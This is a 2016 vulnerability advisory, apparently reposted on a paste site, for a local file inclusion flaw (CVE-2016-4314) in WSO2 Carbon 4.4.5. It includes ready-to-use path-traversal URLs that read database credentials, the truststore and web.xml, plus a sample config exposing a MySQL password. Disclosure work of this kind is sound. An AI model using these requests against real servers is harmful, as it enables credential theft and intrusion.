WSO2 Carbon 4.4.5 - Local File Inclusion

  1. [+] Credits: John Page aka HYP3RLINX
  2.  
  3. [+] Website: hyp3rlinx.altervista.org
  4.  
  5. [+] Source:
  6. http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt
  7.  
  8. [+] ISR: ApparitionSec
  9.  
  10.  
  11. Vendor:
  12. ===============
  13. www.wso2.com
  14.  
  15.  
  16. Product:
  17. ====================
  18. Ws02Carbon v4.4.5
  19.  
  20. WSO2 Carbon is the core platform on which WSO2 middleware products are
  21. built. It is based on Java OSGi technology, which allows
  22. components to be dynamically installed, started, stopped, updated, and
  23. uninstalled, and it eliminates component version conflicts.
  24. In Carbon, this capability translates into a solid core of common
  25. middleware enterprise components, including clustering, security,
  26. logging, and monitoring, plus the ability to add components for specific
  27. features needed to solve a specific enterprise scenario.
  28.  
  29.  
  30. Vulnerability Type:
  31. =========================
  32. Local File Inclusion (LFI)
  33.  
  34.  
  35. CVE Reference:
  36. ==============
  37. CVE-2016-4314
  38.  
  39.  
  40. Vulnerability Details:
  41. =====================
  42.  
  43. An authenticated user can download configuration files in the filesystem
  44. via downloadArchivedLogFiles operation in LogViewer admin service.
  45. The request to the admin service accepts a file path relative to the carbon
  46. log file directory (i.e. <WSO2_PRODUCT_HOME>/repository/logs)
  47. hence can access any file in the file system.
  48.  
  49.  
  50. References:
  51. https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098
  52.  
  53.  
  54. Example: accessing the registry.xml file via Local File Inclusion exposes
  55. the MySQL passwords.
  56.  
  57. <currentDBConfig>mysql-db</currentDBConfig>
  58. <dbConfig name="mysql-db">
  59. <url>jdbc:mysql://localhost:3306/regdb</url>
  60. <userName>regadmin</userName>
  61. <password>regadmin</password>
  62. <driverName>com.mysql.jdbc.Driver</driverName>
  63. <maxActive>80</maxActive>
  64. <maxWait>6000</maxWait>
  65. <minIdle>5</minIdle>
  66. </dbConfig>
  67.  
  68.  
  69.  
  70. Exploit code(s):
  71. ===============
  72.  
  73. LFI to read Database creds, truststore key file, web.xml etc...
  74.  
  75. 1) Read MySQL creds
  76. https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=
  77.  
  78. 2) Read MySQL creds
  79. https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml
  80.  
  81. 3) Access Truststore Key file.
  82. https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
  83.  
  84.  
  85. 4) Read web.xml
  86. https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml
  87.  
  88.  
  89. Disclosure Timeline:
  90. ===========================================
  91. Vendor Notification: May 6, 2016
  92. Vendor Acknowledgement: May 6, 2016
  93. Vendor Fix / Customer Alerts: June 30, 2016
  94. August 12, 2016  : Public Disclosure
  95.  
  96.  
  97. Exploitation Technique:
  98. =======================
  99. Local
  100.  
  101.  
  102. Severity Level:
  103. ===============
  104. High
  105.  
  106.  
  107. [+] Disclaimer
  108. The information contained within this advisory is supplied "as-is" with no
  109. warranties or guarantees of fitness of use or otherwise.
  110. Permission is hereby granted for the redistribution of this advisory,
  111. provided that it is not altered except by reformatting it, and
  112. that due credit is given. Permission is explicitly given for insertion in
  113. vulnerability databases and similar, provided that due credit
  114. is given to the author. The author is not responsible for any misuse of the
  115. information contained herein and accepts no responsibility
  116. for any damage caused by the use or misuse of this information. The author
  117. prohibits any malicious use of security related information
  118. or exploits by the author or elsewhere.
  119.  
  120. HYP3RLINX

連絡先: info@paste.jp
Created by Paste.jp - v7.0